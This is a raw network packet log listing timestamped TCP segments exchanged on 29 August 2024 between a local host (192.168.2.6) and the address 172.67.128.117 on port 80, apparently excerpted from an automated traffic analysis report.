                                    Aug 29, 2024 12:02:35.416121006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416134119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416140079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.416188955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.461436987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461577892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.461910963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461925030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461963892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.461973906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461987019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461997986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462007999 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462059021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462079048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462090969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462101936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462121010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462121964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462137938 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462171078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462275982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462286949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462299109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462310076 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462316036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462321997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462335110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462344885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462346077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462357044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462367058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462393999 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462584019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462595940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462614059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462625027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462626934 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462635994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462644100 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462647915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462660074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462671995 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462677002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462691069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462697983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462737083 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462898970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462912083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462922096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462933064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462944031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462944984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462954998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462960005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462971926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462984085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462992907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462995052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463006020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463016033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463023901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463027000 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463037968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463042021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463048935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463059902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463071108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463072062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463083982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463099003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463099957 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463115931 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463119030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463129997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463140011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463140965 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463161945 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463187933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463223934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463237047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463247061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463264942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463278055 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463279009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463290930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463301897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463310003 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463315010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463325977 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463351011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463465929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463481903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463495970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463500023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463509083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463521004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463526964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463552952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463608027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463618994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463625908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463630915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463638067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463641882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463694096 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463704109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463716030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463727951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463738918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463740110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463749886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463762045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463773966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463773966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463784933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463804960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463819027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463943005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463998079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464085102 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464096069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464107037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464118958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464126110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464132071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464143038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464154959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464174032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464231014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464241982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464251995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464257002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464274883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464276075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464287043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464299917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464306116 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464309931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464323044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464334965 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464350939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464375973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464495897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464507103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464518070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464529037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464536905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464544058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464572906 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464631081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464648008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464654922 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464659929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464673042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464673042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464685917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464689016 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464705944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464737892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464745045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464756012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464796066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464833975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464847088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464858055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464859009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464870930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464884043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464901924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464914083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464920998 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464931965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464946985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464961052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464998007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.506673098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506714106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506726980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506743908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506752014 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.506755114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506764889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506778002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506784916 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.506822109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552611113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552671909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552751064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552762032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552773952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552788019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552798986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552809954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552823067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552825928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552825928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552843094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552849054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552855015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552865028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552876949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552905083 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552905083 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552922964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552941084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552949905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552959919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552970886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552978992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552978992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552987099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552998066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553009033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553018093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553035975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553081036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553420067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553430080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553441048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553477049 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553493023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553500891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553512096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553528070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553539038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553550959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553566933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553566933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553610086 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553731918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553742886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553751945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553765059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553777933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553780079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553788900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553792953 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553803921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553814888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553826094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553837061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553850889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553850889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553881884 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553909063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553920984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553945065 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553960085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553965092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554153919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554167032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554177046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554182053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554188967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554189920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554200888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737106085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737121105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737135887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737150908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737157106 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737158060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737164974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737179041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737194061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737199068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737215042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737225056 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737229109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737236023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737242937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737256050 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737261057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737273932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737288952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737307072 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737339020 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737365007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737376928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737390041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737400055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737411976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737421989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737433910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737447977 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737452030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737476110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737476110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737502098 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737515926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737525940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737538099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737555027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737586021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737698078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737709999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737720966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737747908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737761021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737813950 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737852097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737863064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737868071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737874985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.737893105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.737925053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738025904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738039017 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738050938 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738095045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738095045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738184929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738198042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738209963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738221884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738230944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738231897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738244057 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738255024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738287926 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738287926 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738322973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738327980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738338947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738348961 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738367081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738392115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738523960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738534927 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738544941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738559008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738578081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738595963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738677025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738687992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738692999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738703012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.738725901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.738725901 CEST4971780192.168.2.6172.67.128.117
